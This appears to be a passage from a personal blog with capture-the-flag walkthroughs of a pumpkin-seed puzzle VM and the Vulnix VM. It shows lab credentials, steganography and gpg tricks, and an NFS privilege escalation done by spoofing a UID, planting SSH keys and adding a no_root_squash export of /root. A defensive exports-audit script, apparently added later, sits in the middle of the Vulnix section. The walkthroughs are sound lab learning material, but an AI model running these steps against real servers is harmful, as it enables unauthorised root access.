    If not, look at it closely..

    Figure 5 (screenshot)

    Figure 6 (screenshot)

    To be honest, I didn’t see it at first, so what I did was: I knew the SEED ID is 50609.

    So I ran the strings command and everything became very clear.

    See here:

    strings spy.pcap

    Hence we got the Jack-Be-Little pumpkin seeds ID: 50609

    Step 04:

    Don’t forget that we have a hex-encoded string which needs to be decoded. Here we go:

    cat hex.txt | xxd -p -r

    Acorn Pumpkin Seeds ID: 96454

    Step 05:

    Let’s check the presence of robots.txt file

    Output:

    #
    # robots.txt
    #
    # This file is to prevent the crawling and indexing of certain parts
    # of your site by web crawlers and spiders run by sites like Yahoo!
    # and Google. By telling these "robots" where not to go on your site,
    # you save bandwidth and server resources.
    #
    # This file will be ignored unless it is at the root of your host:
    # Used:    http://example.com/robots.txt
    # Ignored: http://example.com/site/robots.txt
    #
    # For more information about the robots.txt standard, see:
    # http://www.robotstxt.org/robotstxt.html
    
    User-agent: *
    Crawl-delay: 10
    # CSS, JS, Images
    
    # Directories
    Disallow: /includes/
    Disallow: /scripts/
    Disallow: /js/
    Disallow: /secrets/
    Disallow: /css/
    Disallow: /themes/
    
    #Images
    Allow: /images/*.gif
    Allow: /images/*.jpg
    
    # Files
    Disallow: /CHANGELOG.txt
    Disallow: /underconstruction.html
    Disallow: /info.php
    Disallow: /hidden/note.txt
    Disallow: /INSTALL.mysql.txt
    Disallow: /seeds/seed.txt.gpg
    Disallow: /js/hidden.js
    
    
    # Paths (clean URLs)
    Disallow: /comment/reply/
    Disallow: /filter/tips/
    Disallow: /scripts/pcap
    Disallow: /node/add/
    Disallow: /security/gettips/
    Disallow: /search/hidden/
    Disallow: /user/addme/
    Disallow: /user/donotopen/
    Disallow: /user/
    Disallow: /user/settings/

    I must admit that when I saw this exhaustive list, I was extremely excited; however, out of all of them, only the bold-coloured ones were actually working (or revealing information of interest to me).

    Step 04:

    While I was going through the folders (enshrined in the robots.txt), I found this interesting information .

    Robert : C@43r0VqG2=
    Mark : Qn@F5zMg4T
    goblin : 79675-06172-65206-17765

    I thought these might be SSH credentials (as you can see from the nmap result, SSH is running). However, they didn’t work, so I made a note of them and proceeded with my enumeration.

    Step 05:

    I found another intriguing piece of information at 192.168.56.101/seeds/seed.txt.gpg (see here). This file is encrypted with gpg.

    Subsequently, I downloaded seed.txt.gpg and googled the syntax to decrypt a gpg file.

    Syntax:
    gpg --decrypt seed.txt.gpg
    I tried the different passwords gathered from the above enumeration.
    
    Password: SEEDWATERSUNLIGHT

    You might wonder how I got the password SEEDWATERSUNLIGHT. What I did was write down almost every word I thought could be a password into a list and then try each of them manually. (The following screenshot is my note.)

    By the way, I found this word here. If you view the source code, you will see that the sign is nothing but a space.

    Do you see the space in the source code? (Don’t look at the selected strings.)

    See my failed attempt, lol.

    Finally, I got this..

    Based on some googling, I found that the above pictorial representation is Morse code.

    So, we had to decode it. You can simply google "decode Morse code online tool". There are many online tools, and of those, I love this one the most. Here is the link: https://gchq.github.io/CyberChef/

    It has many other features as well; all you have to do is search for Morse code and choose the From Morse Code option.

    We got a SEED:

    BIGMAXPUMPKIN  SEEDS ID: 69507

    I know a little about steganography. Knowing that, I built a habit of running the exiftool, strings and stegosuite commands to extract information out of any media file. Trust me, it is a very tedious task; however, it does pay off sometimes out of nowhere, lol.

    Having said that, one image really carried a text file with it.

    I can’t recall the exact box; however, once while I was pwning a box, when I selected all the text on the website a certain message just showed up there. Therefore, I did a Control+A. Do you see what I see in this message?

    From this image and our previous knowledge of this box, we can expect that there is a gif file called jackolantern.gif under images, which resolves to

    http://192.168.56.17/images/jackolantern.gif

    Truly there is an image by that name, and the meticulous way the author hid this image definitely speaks volumes.

    Yes, after running the stegosuite command with all the passwords, we finally found something useful.

    command:

    stegosuite -x jackolantern.gif -k Qn@F5zMg4T
    
    We were able to extract a text file called decorative.txt
    
    cat decorative.txt 

    We got another SEED ID, i.e.

    Lil’ Pump-Ke-Mon Pumpkin seeds ID : 86568

    I want you to know that it is not only the result; I think we need to celebrate the process as well, like trying and enumerating everything that you could think of.

    To attest to what I am saying, I will enclose one screenshot... :)

    If we read the notes written on the website carefully, we get a hint that we need to arrange the pumpkin seed IDs in order. At that time, this screenshot helped me to order them.

    Sequence of the respective pumpkins and their seed IDs:

    First, "Big Max Pumpkin": 69507
    Second, "Jack-be-little": 50609
    Third, "Acorn Pumpkin": 96454
    Fourth, "Little Pump-ke-Mon": 86568

    I tried many combinations to log in to SSH with the different users and passwords we got so far… Here is the note.

    (many) failed attempts: (one example)

    I found that the following credentials give us a shell.

    Username: jack
    password: 69507506099645486568

    Among the many rudimentary things like checking cron entries, SUID files, the kernel version, etc., I checked what the user account may run with sudo..

    sudo -l

    My favourite goldmine site: https://gtfobins.github.io/

    Run the command

    We got root.. and the flag is here..

    This box taught me many things, and I am gonna revisit all the boxes I pwned again later.. just to evaluate whether I really learned anything out of them 🙂

    That’s all… Wish you all a very productive time 🙂

  • Vulnix walkthrough which bolstered my RHCSA knowledge

    Hello everyone,

    I hope you all are doing well. Today, I am going to do a machine to enhance my penetration testing skills, and guess what, the machine did test my knowledge of RHCSA (RHEL8). The machine was easy, but you can’t say it is easy until you have some knowledge of NFS (Network File System) shares. I was like “finally the training I attended in Bangalore comes to use now, lol”.

    The machine is called vulnix and you can easily get it from the vulhub website. When I nmap (scan) the box, a huge list of running services was revealed, and of course you can enumerate each and every service (one by one); that is actually a recommended way to learn, or a way to get better insight into the machine. This, I believe, is how a professional pentester should approach a machine. However, what I did was simply break the services into different categories and enumerate all the familiar services first.

    Ok, let’s do the box.

    As always, my host machine IP address is 192.168.56.1

    sudo arp-scan --interface=vboxnet0 192.168.56.1/24

    Target Machine IP: 192.168.56.13

    nmap -sC -sV -p- 192.168.56.13 -oN nmap.log

    -sC  run nmap's default scripts
    -sV  probe services and their versions
    -p-  scan all 65535 ports
    -oN  write normal output to the given file

    I did an extra step here; however, it is not necessary for you. I just did this to show the readers that NFS versions 2 to 4 are running. Therefore, we can exploit either 2 or 3; 4 is comparatively secure.

    To get a peek, you can run the following commands to find out which folders are exported and to mount one of them.

    To know a little about NFS: 

    click here and here. 

    showmount -e 192.168.56.13
    sudo mount -o vers=3 192.168.56.13:/home/vulnix mnt

    Based on the output, we can be certain that there is a user named vulnix (/home/vulnix). Now, what we need to do is create this user with UID 2008 on our own machine.

    sudo useradd --uid 2008 vulnix

    sudo usermod -aG sudo vulnix

    su vulnix

    cd /mnt

    mkdir .ssh

    ssh-keygen
        ./id_rsa    (at the file-name prompt: save the keys in the current directory, i.e. /home/vulnix/mnt/.ssh on the mounted share, rather than the default path)

    I split the pane so that you can see both users (researcher and vulnix).

    From the nmap result, we know that the machine is running SSH. Therefore, we can try to log in to the remote machine with the SSH key we previously placed on the target machine through the NFS share.

    To know a little more about SSH and its configuration, click here.

    cat id_rsa.pub > authorized_keys
    
    ssh -i id_rsa vulnix@192.168.56.13

    sudo -l

    sudoedit /etc/exports

    and add:

    /root *(rw,no_root_squash)

    No Root Squash (link)

    There are many options for NFS, and I want to keep this article short but effective, so I am leaving out many of the various configuration items that you could do. However, there is one option that is worth mentioning: no_root_squash. By default NFS will downgrade any files created with root permissions to the nobody user. This is a security feature that prevents privileges from being shared unless specifically requested.

    If I create a file as the root user on the client on the NFS share, by default that file is owned by the nobody user.

     root@client:~# touch /shared/nfs1/file2 
     root@server:/nfs# ls -la file2
      -rw-r--r-- 1 nobody nogroup 0 Nov 18 18:06 file2
    

    Sometimes it is important to share files that are owned by root with the proper permissions; in these cases this can be done by simply adding the no_root_squash attribute to the /etc/exports configuration.

    Adding no_root_squash

    Edit the /etc/exports file:

     root@server:/nfs# vi /etc/exports
    

    Modify the /nfs line to:

     /nfs 192.168.0.195/32(rw,sync,no_root_squash)

    In our case:

    /root *(rw,no_root_squash)     (the * host entry means any client may mount it)

    Now, let’s reboot the VM so that the target machine picks up those changes.
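    The two settings this walkthrough leaned on, no_root_squash on a wildcard export and the plain UID trust that made creating a local user with UID 2008 work, are exactly what a defender should audit for. The following is an added example, not code from the original post or from any NFS tool: it parses exports(5) lines such as the ones above and reports those findings; the sample exports file is constructed.

```python
# Added example (not from the original post): audit exports(5) entries for the
# settings the walkthrough relied on: no_root_squash, wildcard hosts and plain
# UID trust (why "useradd --uid 2008 vulnix" worked). Sample data is constructed.
import re

# Constructed sample: the entries quoted in the post plus one hardened line.
SAMPLE_EXPORTS = """
# constructed /etc/exports
/home/vulnix *(rw,sync)
/root *(rw,no_root_squash)
/nfs 192.168.0.195/32(rw,sync,no_root_squash)
/srv/pub 10.0.0.0/24(ro,sync,all_squash)
"""
# host part followed by an optional "(opt,opt,...)" list
CLIENT_RE = re.compile(r'^([^(]*)(?:\((.*)\))?$')


def parse_exports(text):
    """Return (path, host, option-set) for every client on every export line."""
    records = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()    # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for token in clients or ['*']:         # no host at all means everyone
            m = CLIENT_RE.match(token)
            if not m:
                continue                       # malformed token, skip it
            host, opts = m.groups()
            options = {o for o in (opts or '').split(',') if o}
            records.append((path, host or '*', options))
    return records


def audit_exports(text):
    """Map (path, host) to the findings a defender should act on."""
    findings = {}
    for path, host, opts in parse_exports(text):
        issues = []
        if 'no_root_squash' in opts:
            issues.append('client root is server root (no_root_squash)')
        elif 'all_squash' not in opts:
            # root_squash is the default, but other UIDs are still taken
            # verbatim from the client, so a matching local UID is enough.
            issues.append('client UIDs trusted (no all_squash)')
        if host == '*' or host.startswith('*.'):
            issues.append('any host may mount (wildcard)')
        if 'rw' in opts and path.rstrip('/') in ('', '/root', '/etc'):
            issues.append('writable export of a privileged path')
        if issues:
            findings[(path, host)] = issues
    return findings
```

    Running audit_exports over the real /etc/exports of a server flags the /root line from this post as the worst case (root mapping, wildcard host and a writable privileged path at once), while the all_squash entry produces no finding.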

    sudo mount -o vers=3 192.168.56.13:/root mnt

    Now, we will use the previous concept: generate an SSH key and try to log in with it to get root access.

    sudo -i  
    
    cd /home/researcher/vulhub/vulnix/mnt 
    
    cat trophy.txt

    This flag looks weird though lol..

    That’s it.. Later, if I get time, I will populate this post with the other enumerations as well (full of rabbit holes, but good to look into)..

    It’s 23:58 and the perfect time to call it a day 🙂